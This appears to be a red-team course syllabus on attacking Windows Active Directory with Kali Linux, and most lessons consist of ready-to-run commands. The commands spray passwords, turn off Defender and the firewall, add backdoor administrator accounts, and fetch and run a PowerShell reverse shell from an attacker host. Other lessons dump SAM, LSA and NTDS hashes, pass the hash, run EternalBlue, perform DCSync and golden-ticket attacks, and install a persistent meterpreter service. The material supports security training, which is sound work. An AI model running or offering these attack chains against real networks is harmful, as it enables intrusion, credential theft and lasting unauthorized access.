Active Directory Pentesting With Kali Linux - Red Team
Most enterprise networks today are managed using Windows Active Directory, and it is imperative for a security professional to understand the threats to the Windows infrastructure.
Active Directory Pentesting is designed to help security professionals understand, analyze and practice threats and attacks in a modern Active Directory environment. The course is beginner friendly and comes with walkthrough videos and documents containing all the commands executed in the videos. The course is based on our years of experience and research in breaking Windows and AD environments.
When it comes to AD security, there is a large knowledge gap which security professionals and administrators struggle to fill. Over the years, I have taken numerous world trainings on AD security and always found that there is a lack of quality material and, especially, a lack of good walkthroughs and explanation.
The course simulates real-world attack and defense scenarios: we start with a non-admin user account in the domain and work our way up to enterprise admin. The focus is on exploiting the variety of overlooked domain features and not just software vulnerabilities.
We cover topics like AD enumeration, tools to use, domain privilege escalation, domain persistence, Kerberos-based attacks (Golden Ticket, Silver Ticket and more), ACL issues, SQL Server trusts, and bypasses of defenses.
Attacking and Hacking Active Directory With Kali Linux Full Course – Red Team Hacking Pentesting
- 5. winapsearch (Video lesson)
https://rootsecdev.medium.com/forest-a-walk-through-in-hacking-active-directory-c83ecb21e1a9
- 6. LdapDomainDump (Video lesson)
Download it here:
https://github.com/dirkjanm/ldapdomaindump
- 7. Enumerating With Enum4Linux (Video lesson)
enum4linux -u ippsec -p Password12345 -a 192.168.1.50
- 8. NMAP - Users (Video lesson)
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ippsec,cn=users,dc=pentesting,dc=local",ldap.password=Password12345,ldap.qfilter=users,ldap.attrib=sAMAccountName' 192.168.1.50 -Pn
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='pentesting.local' 192.168.1.50 -Pn
- 9. GetADUsers.py (Video lesson)
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/GetADUsers.py
python3 GetADUsers.py -all -dc-ip 192.168.1.50 pentesting.local/ippsec
wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/findDelegation.py
python3 findDelegation.py -dc-ip 192.168.1.50 pentesting.local/ippsec
python3 GetUserSPNs.py -dc-ip 192.168.1.50 pentesting.local/ippsec
- 10. CrackMapExec Intro (Video lesson)
https://github.com/byt3bl33d3r/CrackMapExec
- 11. CrackMapExec - Password Spraying (Video lesson)
Brute-forcing examples:
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --no-bruteforce
crackmapexec <protocol> <target(s)> -u username1 username2 -p password1
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes
- 12. CrackMapExec - ENUM 1.1 (Video lesson)
Enumerate shares and access
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --shares
Enumerate active sessions
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --sessions
Enumerate disks
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --disks
Enumerate logged on users
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --loggedon-users
Enumerate domain users
crackmapexec smb 192.168.1.50-55 -u ippsec -p Password12345 --users
- 13. CrackMapExec - ENUM 1.2 (Video lesson)
python3 crackmapexec.py smb 192.168.1.50 -u 'ippsec' -p 'Password12345' --users
Enumerate users by bruteforcing RID
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --rid-brute
Enumerate domain groups
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --groups
Enumerate local groups
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --local-groups
Obtain domain password policy
cme smb 192.168.1.0/24 -u USERNAME -p 'PASSWORDHERE' --pass-pol
- 14. CrackMapExec - Command Execution (Video lesson)
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'ipconfig'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'whoami /groups'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableRealtimeMonitoring $true'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Get-MpComputerStatus'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Set-MpPreference -DisableIOAVProtection $true'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall show allprofiles'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'netsh advfirewall set allprofiles state off'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'Invoke-WebRequest -Uri "http://192.168.1.223:8000/users.txt" -OutFile "c:\Users\ippsec\Desktop\user.txt"'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'dir c:\Users\ippsec\Desktop'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'type c:\Users\ippsec\Desktop\user.txt'
- 15. crackmapexec - Command execution + Using Local Auth (Video lesson)
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'net user /add admin Password12345'
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -x 'net user'
# Add the new user to the local Administrators group
crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345 -x 'net localgroup administrators admin /add'
crackmapexec winrm 192.168.215.138 -u ippsec -p Password12345 -x 'net localgroup administrators'
# Authenticate with the local account instead of a domain account
crackmapexec smb 192.168.215.138 -u admin -p Password12345 --local-auth
- 16. Get PowerShell Reverse Shell (Video lesson)
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcpOneLine.ps1
mv Invoke-PowerShellTcpOneLine.ps1 invoke.ps1
nc -lvp 1234
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'
- 17. Dumping SAM (Video lesson)
SAM is short for the Security Account Manager, which manages all the local user accounts and their passwords. It acts as a database: all the passwords are hashed and then stored in the SAM. It is the responsibility of the LSA (Local Security Authority) to verify user logins by matching the passwords against the database maintained in the SAM. The SAM starts running in the background as soon as Windows boots up. The SAM file is found in C:\Windows\System32\config, and the hashed passwords saved in the SAM can also be found in the registry: open the Registry Editor and navigate to HKEY_LOCAL_MACHINE\SAM.
crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --sam
# The dumped hashes are written to the CME log directory
ls ~/.cme/logs/
- 18. Dumping LSA + PTH with CME (Video lesson)
sudo crackmapexec smb 192.168.1.54 -u ippsec -p Password12345 --lsa
# Where the dumps are stored
ls ~/.cme/logs/
# Cracking with John
john --format=NT hash
john --format=NT hash --show
john --format=NT --wordlist=/home/user/Desktop/rockyou.txt hash
# Pass the NT hash over WinRM
crackmapexec winrm 192.168.1.54 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'
# Against the domain controller, too
crackmapexec winrm 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -X 'whoami'
# Dump the entire NTDS database (all domain NTLM hashes) with --ntds
sudo crackmapexec smb 192.168.1.50 -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da --ntds
- 19. pth-winexe and xfreerdp (Video lesson)
pth-winexe -U pentesting/
pth-winexe
apt-get update
apt-get install freerdp-x11
xfreerdp /u:ippsec /d:win2012 /pth: /v:192.168.1.54
- 20. CrackMapExec Modules (Video lesson)
crackmapexec smb -L
crackmapexec smb -M mimikatz --options
sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345
sudo crackmapexec smb 192.168.1.54 -M mimikatz -u ippsec -p Password12345 --server-port 81
# Module output is saved here
ls /root/.cme/logs/
- 21. CrackMapExec CMEDB (Video lesson)
# Start the database shell
cmedb
help
proto smb
help
creds
sudo crackmapexec smb 192.168.1.50 -id 2
sudo crackmapexec smb 192.168.1.50 -id 3
- 22. BloodHound Installation (Video lesson)
Install Java:
echo "deb http://httpredir.debian.org/debian stretch-backports main" | sudo tee -a /etc/apt/sources.list.d/stretch-backports.list
sudo apt-get update
Install Neo4j:
1. Add the neo4j repo to your apt sources:
wget -O - https://debian.neo4j.com/neotechnology.gpg.key | sudo apt-key add -
echo 'deb https://debian.neo4j.com stable 4.0' | sudo tee /etc/apt/sources.list.d/neo4j.list
sudo apt-get update
2. Install apt-transport-https with apt:
sudo apt-get install apt-transport-https
3. Install neo4j community edition using apt:
sudo apt-get install neo4j
4. Stop neo4j:
sudo systemctl stop neo4j
5. Start neo4j, either in the foreground or as a service:
cd /usr/bin
./neo4j console
sudo systemctl start neo4j
Open a web browser and navigate to https://localhost:7474/. You should see the neo4j web console.
Authenticate to neo4j in the web console with username neo4j, password neo4j.
You'll be prompted to change this password.
Download the BloodHound GUI:
Download the latest version of the BloodHound GUI from
https://github.com/BloodHoundAD/BloodHound/releases
Unzip the folder, then run BloodHound with the --no-sandbox flag:
./BloodHound.bin --no-sandbox
https://bloodhound.readthedocs.io/en/latest/installation/linux.html
- 23. BADDD No AUDIO Getting Shells with CrackMapExec (Video lesson)
sudo msfconsole
use exploit/multi/handler
set LHOST 192.168.1.223   # the local (attacking) machine
set LPORT 470
# Serve the PowerShell stager over HTTP from the local machine
python3 -m http.server
crackmapexec winrm 192.168.1.54 -u ippsec -p Password12345 -X 'iex (New-Object Net.WebClient).DownloadString("http://192.168.1.223:8000/invoke.ps1")'
- 24. Basic commands (Video lesson)
AMSI (AntiMalware Scan Interface)
Windows AMSI is integrated into the following components:
- PowerShell (scripts, interactive use, and dynamic code evaluation)
- PowerShell ISE (the Windows PowerShell IDE)
- Windows Script Host (wscript.exe and cscript.exe) (scripts and dynamic code evaluation)
- User Account Control (UAC) (using a different type of AMSI provider)
- Office 365 (JavaScript/VBA)
- Office 365 (documents)
- .NET Framework 4.8 (scanning of all assemblies)
- Windows Management Instrumentation (WMI)
- 25. Upload and Download (Video lesson)
Evil-WinRM built-in commands:
upload: local files can be auto-completed using the Tab key. A remote_path is not needed if the local file is in the same directory as the evil-winrm.rb file.
usage: upload local_path remote_path
download: local_path is not needed if the remote file is in the current directory.
usage: download remote_path local_path
services: list all services. No administrator permissions needed.
- 26. PowerView.ps1 (Video lesson)
iex (new-object net.webclient).downloadstring('http://192.168.1.223:8000/PowerView.ps1')
- 27. Build SharpSploit - Enumeration (Video lesson)
Dll-Loader -http -path http://192.168.1.223:8000/SharpSploit.dll
menu
[SharpSploit.
[SharpSploit.Enumeration.Net]::GetNetLocalGroupMembers()
[SharpSploit.Enumeration.Net]::GetNetLocalGroups()
[SharpSploit.Enumeration.Net]::GetNetLoggedOnUsers()
[SharpSploit.Enumeration.Net]::GetNetSessions()
[SharpSploit.Enumeration.Net]::GetNetShares()
- 28. User, Group, and Network (Video lesson)
User Enumeration
Get current username
echo %USERNAME% || whoami
$env:username
List user privilege
whoami /priv
whoami /groups
List all users
net user
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
List logon requirements (lockout threshold, password policy); useful to know before brute-forcing
net accounts
Get details about a user (i.e. administrator, admin, current user)
net user administrator
net user admin
net user %USERNAME%
List all local groups
net localgroup
Get-LocalGroup | ft Name
Get details about a group (i.e. administrators)
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
Network Enumeration
List all network interfaces, IP, and DNS.
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
List current routing table
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
List the ARP table
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
List all current connections
netstat -ano
List firewall state and current configuration
netsh advfirewall firewall dump
netsh firewall show state
netsh firewall show config
List firewall's blocked ports
$f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports
Disable firewall
netsh firewall set opmode disable
netsh advfirewall set allprofiles state off
List all network shares
net share
SNMP Configuration
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
- 29. OS, AV, and Configuration (Video lesson)
- 30. Tools - Local Priv Esc (Video lesson)
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
- 31. Sherlock and Watson (Video lesson)
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
https://github.com/rasta-mouse/Sherlock
https://github.com/rasta-mouse/Watson
- 32. CVE-2019-1388 (Video lesson)
- 33. SeImpersonate (Video lesson)
- 34. Unquoted Service Path (Video lesson)
- 35. Windows - Privilege Escalation and Local Enumeration Cheat Sheet (Text lesson)
- 36. Recommended Windows Hack The Box machines (Text lesson)
- 37. Basics and Installing (Video lesson)
https://github.com/BC-SECURITY/Empire
sudo apt install powershell-empire
sudo powershell-empire
- 38. Getting a Shell + CME + PowerShell (Video lesson)
https://alpinesecurity.com/blog/empire-a-powershell-post-exploitation-tool/
- 39. Getting a shell + Evil-WinRM + Bat File (Video lesson)
Listeners:
help
uselistener http
info   # displays all the options that you can tweak
set BindIP <Kali IP address>
set Port <any port number other than 80>
execute
https://www.youtube.com/watch?v=52xkWbDMUUM&ab_channel=HackerSploit
- 40. Privilege Escalation 1 - Reverse Shell With Unquoted Path (Video lesson)
- 41. Privilege Escalation 2 - Stager with NT/SYSTEM (Video lesson)
- 42. Privilege Escalation 3 (Video lesson)
net user raba Password123 /add
net localgroup administrators raba /add
net localgroup "Remote Management Users" raba /add
# then remove the old account
- 43. Elevated with Empire - Mimikatz and pth (Video lesson)
- 44. Pth + dcsync + dcshadow - 1 (Video lesson)
- 45. Troubleshooting Empire Pth + dcsync + dcshadow - 2 (Video lesson)
- 46. Failed to get + dcsync + dcshadow - 3 (Video lesson)
- 47. Getting Shell with JenkinsAdmin (Video lesson)
evil-winrm -u jenkinsadmin -H ffce0c45c18cfdbb3ec16289a9d704da -i 192.168.1.50
upload /tmp/launcher.bat C:\Users\jenkinsadmin\Documents\launcher.bat
C:\Users\jenkinsadmin\Documents\launcher.bat
- 48. Finally Getting Dcsync + Persistent (Video lesson)
- 49. Intro (Video lesson)
Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool for many attackers and defenders. Point Metasploit at your target, pick an exploit and the payload to drop, and hit Enter.
- 50. Exploiting Eternal Blue with Metasploit (Video lesson)
Check if the host is exploitable, then run the module:
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.1.53
set smbpass Password123
set smbuser student1
set smbdomain pentesting.local
set payload windows/meterpreter/reverse_tcp
run
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
- 51. Enumeration 1 - User, Groups, Computers (Video lesson)
use auxiliary/gather/kerberos_enumusers
sysinfo
ps
post/windows/gather/enum_ad_users
post/windows/gather/enum_domain_group_users
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_ad_user_comments
post/windows/gather/enum_domain
post/windows/gather/enum_computers
post/windows/gather/resolve_sid
run post/windows/gather/enum_ad_computers
post/windows/gather/local_admin_search_enum
post/windows/gather/enum_ad_service_principal_names
- 52. Enumeration 2 - Arp, Tokens, Patches (Video lesson)
run post/windows/gather/arp_scanner RHOSTS=192.168.1.0/24
ipconfig
netstat
route
#Windows Gather Enumerate Domain Admin Tokens (T
post/windows/gather/enum_tokens
post/windows/gather/enum_patches
post/windows/gather/credentials/winscp
#Windows Gather Powershell Environment Setting E
post/windows/gather/enum_powershell_env
post/windows/gather/enum_ie
post/windows/gather/bloodhound
For more:
search post/windows/gather/
- 53. Enumeration 3 - Shares, SMB, and More (Video lesson)
use post/windows/gather/enum_shares
use post/windows/gather/enum_services
use post/windows/gather/enum_snmp
use post/windows/gather/enum_chrome
use post/windows/gather/enum_av_excluded
use post/windows/gather/enum_putty_saved_sessions
use post/windows/gather/enum_applications
use post/windows/gather/win_privs
use post/windows/gather/forensics/browser_history
for more:
search post/windows/gather/
- 54. Exploit Suggester (Video lesson)
LOCAL_EXPLOIT_SUGGESTER
run post/multi/recon/local_exploit_suggester
post/windows/gather/win_privs
- 55. Exploit Suggester 2 (Video lesson)
- 56. Backdoor add user (Video lesson)
post/windows/manage/add_user
set addtogroup true
set username test
set group administrators
set session 2
post/windows/manage/delete_user
- 57. HashDump With Metasploit (Video lesson)
search hashdump
search credential_collector
post/windows/gather/hashdump
post/windows/gather/credentials/credential_collector
meterpreter > load kiwi
meterpreter > help
Testing the dumped credentials against other hosts:
crackmapexec smb 192.168.1.50 192.168.1.55 -u ippsec -p Password123!
- 58. Lateral Movement - PTH With Metasploit (Video lesson)
https://www.offensive-security.com/metasploit-unleashed/psexec-pass-hash/
Pass the Hash with psexec: all this job needs is the NTLM hash of a privileged user, which is exactly what we obtained earlier with Mimikatz.
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser ippsec
set SMBPass e52cac67419a9a22c17ec4fe2a5374cb:2b576acbe6bcfda7294d6bd18041b8fe
set rhosts 192.168.1.55
set lport 4457
options
load kiwi
creds_msv
# The LM half of the hash can be left as all zeros: 00000000000000000000000000000000
# Check whether the user is part of Domain Users
use post/windows/gather/enum_domain_group_users
- 59. Lateral Movement To DC - Metasploit (Video lesson)
use exploit/windows/smb/psexec
set SMBDomain pentesting.local
set smbuser s4vitar
set SMBPass 00000000000000000000000000000000:58a478135a93ac3bf058a5ea0e8fdb71
set rhosts 192.168.1.50
set lport 4457
options
load kiwi
creds_msv
# The LM half of the hash can be left as all zeros: 00000000000000000000000000000000
# Check whether the user is part of Domain Users
use post/windows/gather/enum_domain_group_users
use post/windows/gather/credentials/domain_hashdump
scanner/smb/impacket/secretsdump
- 60. Steal_Token and Dumping All Hashes - Metasploit (Video lesson)
The Metasploit framework has an extension called incognito which allows us to perform activities such as token stealing and manipulation. These activities matter in the privilege escalation stage of a penetration test because, if we can steal the token of an administrator, for example, we can perform higher-privilege operations on the target.
use post/windows/gather/credentials/domain_hashdump
use incognito
list_tokens -u
impersonate_token PENTESTING\Administrator
- 61. DcSync With Metasploit (Video lesson)
From Domain Controller
meterpreter > use incognito
meterpreter > impersonate_token PENTESTING\Administrator
meterpreter > load kiwi
meterpreter > help
meterpreter > kiwi_cmd 'lsadump::dcsync /user:Administrator'
meterpreter > kiwi_cmd 'lsadump::dcsync /user:krbtgt'
- 62. Golden Ticket With Metasploit (Video lesson)
use post/windows/escalate/golden_ticket
Golden Ticket attacks can be carried out against Active Directory domains, where access control is implemented using Kerberos tickets issued to authenticated users by a Key Distribution Service.
The attacker gains control over the domain's Key Distribution Service account (the KRBTGT account) by stealing its NTLM hash. This allows the attacker to generate Ticket Granting Tickets (TGTs) for any account in the Active Directory domain.
With valid TGTs, the attacker can request access to any resource or system in the domain from the Ticket Granting Service (TGS).
Because the attacker controls the component of the access control system that is responsible for issuing TGTs, they hold a "golden ticket" to any resource on the domain.
kerberos_ticket_list
kerberos_ticket_use /root/.msf4/loot/20210501011013_default_192.168.1.50_golden.ticket_888290.bin
- 63. BACKDOOR METERPRETER SERVICE 1 (Video lesson)
After going through all the hard work of exploiting a system, it’s often a good idea to leave yourself an easier way back into the system for later use. This way, if the service you initially exploited is down or patched, you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, that will create a Meterpreter service that will be available to you even if the remote system is rebooted.
meterpreter > run persistence -h
meterpreter > run persistence -U -i 5 -p 4458 -r 192.168.1.223
meterpreter > exit
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.223
set LPORT 4458
exploit
When a user logs in to the remote system, a Meterpreter session is opened up for us.
- 64. BACKDOOR METERPRETER SERVICE 2 (Video lesson)
- 65. Intro Domain Enumeration (Video lesson)
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
- 66. Domain User Enumeration (Video lesson)
- 67. Domain Group Enumeration (Video lesson)
- 68. Domain Computer/Servers Enumeration (Video lesson)
- 69. PowerView - GPO and OU (Video lesson)
- 70. Domain Shares Enumeration (Video lesson)
- 71. PowerView - ACL (Video lesson)
- 72. Active Directory Recon (Video lesson)
- 73. BloodHound Installation (Video lesson)
- 74. BloodHound Basics (Video lesson)
- 75. Domain Enumeration Cheat Sheet - PowerView (Text lesson)
- 76. Intro to Lateral Movement - RDP (Video lesson)
https://mega.nz/folder/wFBUyZTa#KbU76tPKBymvg6HNObsTJg
- 77. How Kerberos Works (Text lesson)
- 78. Dumping SAM and SYSTEM For Offline Cracking (Video lesson)
- 79. SAM & LSA with Mimikatz (Video lesson)
- 80. PassTheHash with Mimikatz (Video lesson)
A Pass-the-Hash (PtH) attack is a technique whereby an attacker captures a password hash (as opposed to the password characters) and then simply passes it through for authentication and potentially lateral access to other networked systems. The threat actor does not need to crack the hash to obtain a plaintext password. PtH attacks exploit the authentication protocol, as the password hash remains static for every session until the password is rotated. Attackers commonly obtain hashes by scraping a system's active memory, among other techniques.
- 81. Passing the ticket (Video lesson)
In a pass-the-ticket attack, an attacker is able to extract a Kerberos Ticket Granting Ticket (TGT) from LSASS memory on one system and then use it on another system to request Kerberos service tickets (TGS) and gain access to network resources.
One primary difference between pass-the-hash and pass-the-ticket is that Kerberos TGTs expire (after 10 hours by default), whereas NTLM hashes only change when the user changes their password. So a TGT must be used within its lifetime, although it can be renewed for a longer period of time (7 days).
- 82. Pass the ticket with Rubeus (Video lesson)
- 83. Session Hijack (Video lesson)
- 84. SMB Relay Attack (Video lesson)
- 85. 10 ways to get dump files (Text lesson)